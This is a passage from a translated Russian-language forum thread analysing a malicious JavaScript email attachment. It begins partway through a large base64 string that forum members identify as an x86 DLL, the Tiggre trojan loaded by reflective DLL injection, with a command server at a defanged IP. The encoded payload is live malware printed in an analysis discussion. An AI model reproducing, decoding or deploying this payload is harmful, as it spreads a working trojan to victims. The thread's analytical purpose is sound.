G9ja2VkQ29tcGFyZUV4Y2hhbmdlAADiAkluaXRpYWxpemVDcml0aWNhbFNlY3Rpb24A7gBFbnRlckNyaXRpY2FsU2VjdGlvbgAAOQNMZ
WF2ZUNyaXRpY2FsU2VjdGlvbgAAWQRTZXRFdmVudAAADwRSZXNldEV2ZW50AAD5BFdhaXRGb3JTaW5nbGVPYmplY3QAggBDcmVhdGVFd
mVudEEAAEtFUk5FTDMyLmRsbAAAMgN3c3ByaW50ZkEAKgJPcGVuSW5wdXREZXNrdG9wAAC6AlNldFRocmVhZERlc2t0b3AAAIIBR2V0V
GhyZWFkRGVza3RvcAAALAJPcGVuV2luZG93U3RhdGlvbkEAAKoCU2V0UHJvY2Vzc1dpbmRvd1N0YXRpb24AaAFHZXRQcm9jZXNzV2luZ
G93U3RhdGlvbgCSAUdldFdpbmRvd0RDAGUCUmVsZWFzZURDAJwBR2V0V2luZG93UmVjdAAjAUdldERlc2t0b3BXaW5kb3cAAFVTRVIzM
i5kbGwAABMAQml0Qmx0AAAvAENyZWF0ZUNvbXBhdGlibGVCaXRtYXAAADAAQ3JlYXRlQ29tcGF0aWJsZURDAADjAERlbGV0ZURDAADmA
ERlbGV0ZU9iamVjdAAAdwJTZWxlY3RPYmplY3QAAEdESTMyLmRsbABkAUdldFVzZXJOYW1lQQAAQURWQVBJMzIuZGxsAACGAENyZWF0Z
VN0cmVhbU9uSEdsb2JhbABvbGUzMi5kbGwAIAVad0FsbG9jYXRlVmlydHVhbE1lbW9yeQCSBlp3V3JpdGVWaXJ0dWFsTWVtb3J5AAA3B
lp3UmVzdW1lVGhyZWFkAABCBlp3U2V0Q29udGV4dFRocmVhZAAAbnRkbGwuZGxsAEMBU3RyU3RyQQAzAFBhdGhBcHBlbmRBAEYAUGF0a
EZpbmRFeHRlbnNpb25BAABTSExXQVBJLmRsbABXUzJfMzIuZGxsAABUAE9idGFpblVzZXJBZ2VudFN0cmluZwB1cmxtb24uZGxsAAB1A
kdkaXBsdXNTdGFydHVwAAB0AkdkaXBsdXNTaHV0ZG93bgCYAEdkaXBEaXNwb3NlSW1hZ2UAAPEBR2RpcFNhdmVJbWFnZVRvU3RyZWFtA
E0AR2RpcENyZWF0ZUJpdG1hcEZyb21IQklUTUFQAB8BR2RpcEdldEltYWdlRW5jb2RlcnNTaXplAAAeAUdkaXBHZXRJbWFnZUVuY29kZ
XJzAABnZGlwbHVzLmRsbAAAAAAAAAAAAAAAAAAAAAAAAADdcPNZAAAAAEJLAAABAAAAAQAAAAEAAAA4SwAAPEsAAEBLAAC6JgAAT0sAA
AAAc29ja3Nib3QuZGxsAD9SZWZsZWN0aXZlTG9hZGVyQEBZR0tQQVhAWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADYwAAAAAAAA7Bq8tm9kESbCJQxc8myZAr1TBD6q9f4DdFlyYWdP1zLiw
EmKn6BiA8VkEyPDtN3LXNiiKg7crjmhHX6YorG2J2xZXnzB4aDHQ7jAdUFsfbPLUJq1BZVW6Z0oGL3d7uUIrIcUdCOcxLVSeortSZSdW
kIceFSE7QhPH809PP0djYsAAAAAAAAAADUuOC44OC42NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAABAAAMgAAAALMCAwMTA/MF0wazB7MIcwqzDDMNsw8jAWMVcxoDEAMocynjLYMvUyPjO0M+Mz9jN9NLo02TQKNTI1WDXmNSI2XzaZN
tE27zZaN5k3IjhAOGM4bziEOMA4FzlROZ85qTlvOrA65jpNO1w7oTuzO7g72TsAPGs8jzynPK480jw7PUs9lj2cPbg9vj3cPfQ9Oz5RP
l4+bD57PrE+yD7XPu0+BT8NPxQ/MT83P0k/Wj9fP2k/dj98P4M/ij/HP9g/AAAAIAAAGAEAAAIwPTBUMGMwhDCMMJMwsTDMMNQw2zAaM
TExPjFMMWMxgjGgMSgyOTJKMlEyVzJdMnky6TIhMyYzWjN0M30zjzOeM6UzujPzM/ozADQcNCI0OTRBNGI0ejSINJs0pTS2NMQ0zzTeN
OM07DT7NAA1BTUsNTM1PDVONV01YjVxNXc1ijWQNaY1sTXANQk2MTY/Nks2hDaKNpE24jrzOr07wzvLO9I73zvnO+479Tv7OwU8FjwpP
Eo8WTxzPIE8izyVPCc9dT2MPSM+PT5iPmk+cD56PoA+jz6tPrQ+uj7OPtU+3D7oPu4+Aj8ePyU/Kz9EP3k/hj+OP5U/rj+2P8E/yD/WP
9w/4T/nP+0/8z/5PwAAADAAALQAAAAAMAUwZzCQMJkwoTC2MNwwRDF0MX0xkTGkMd8x7DH/MT4yRDJNMlgyZjJuMnsymTKwMsMy0DLkM
gc0RDRMNFs0ZzRvNHY0izSbNLA09DQmNTE1OzVONVk1uDXNNeA17jUDNhM2JzY9NlY2kTbBNs826jYKNxY3Kzc2Nzw3QjdIN043VDdaN
2A3ZjdsN3I3eDd+N4Q3ijeQN5Y3nDeiN+Y37DfyN/g3/jcEOAo4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
#Example of decrypting functions
#$strexp = "...";
0
ISergey
Maniac
C++ Expert
1409 / 920 / 148
Registered: 02.01.2009
Posts: 2,749
Blog entries: 1
05.12.2017, 15:37 9
Best answer. This post was marked by bliver as the solution

Solution

Quote: message from bliver
I could not understand what is contained in the strexp string, whether it is binary code or MSIL
strexp is a DLL (x86), the body of the malware (or also an intermediate loader)
Trojan:Win32/Tiggre.

The script is a ReflectiveDLLInjection loader
2
bliver
1 / 1 / 0
Registered: 15.08.2017
Posts: 13
05.12.2017, 16:47  [OP] 10
I see, thanks for the answer
0
n0rtn
0 / 0 / 0
Registered: 12.06.2018
Posts: 3
12.06.2018, 18:58 11
Quote: message from bliver
Hello!
I received an email


Inside was a javascript file; I got curious what this malware does.
In the js file there was a big
I unwound it and traced it through the scripts
bliver, greetings! Do you still have the file itself, or even the email with which the malware arrived? Thanks!
0
bliver
1 / 1 / 0
Registered: 15.08.2017
Posts: 13
12.06.2018, 19:45  [OP] 12
Hi! Found it )
0
n0rtn
0 / 0 / 0
Registered: 12.06.2018
Posts: 3
13.06.2018, 12:21 13
Quote: message from bliver
Hi! Found it )
Thanks! As far as I understand, this is not exactly what "arrived" in the email? I would like to write to you in private messages, but I cannot do that yet: too few posts on this forum.

Added 2 hours 42 minutes later
Quote: message from ISergey
strexp is a DLL (x86), the body of the malware (or also an intermediate loader)
Trojan:Win32/Tiggre.

The script is a ReflectiveDLLInjection loader
It seems this DLL contacts a server at the address 5.8.88[.]64
0
bliver
1 / 1 / 0
Registered: 15.08.2017
Posts: 13
13.06.2018, 15:32  [OP] 14
The attachment was like this, only not archived, just a file named Договор.js; the email itself was plain text, as I quoted at the start of the thread.
0
Sandor
Virus fighter
13116 / 11332 / 1762
Registered: 08.10.2012
Posts: 45,842
13.06.2018, 15:35 15
Rules, section 5.7
0
n0rtn
0 / 0 / 0
Registered: 12.06.2018
Posts: 3
13.06.2018, 18:01 16
Quote: message from bliver
The attachment was like this, only not archived, just a file named Договор.js; the email itself was plain text, as I quoted at the start of the thread.
That is why I wanted to talk in private messages, since because of me rule 5.7 had to be broken.
Could you somehow show that email with all its headers (it makes sense to hide the information about your address/server)? Please write to me in private messages when you have time. Viewing the source of an email is very easy.

Thanks!
0
bliver
1 / 1 / 0
Registered: 15.08.2017
Posts: 13
13.06.2018, 19:20  [OP] 17
I cannot show that email, since it was a long time ago and I simply deleted it, and after 2 months deleted emails are purged entirely on the server I use.
1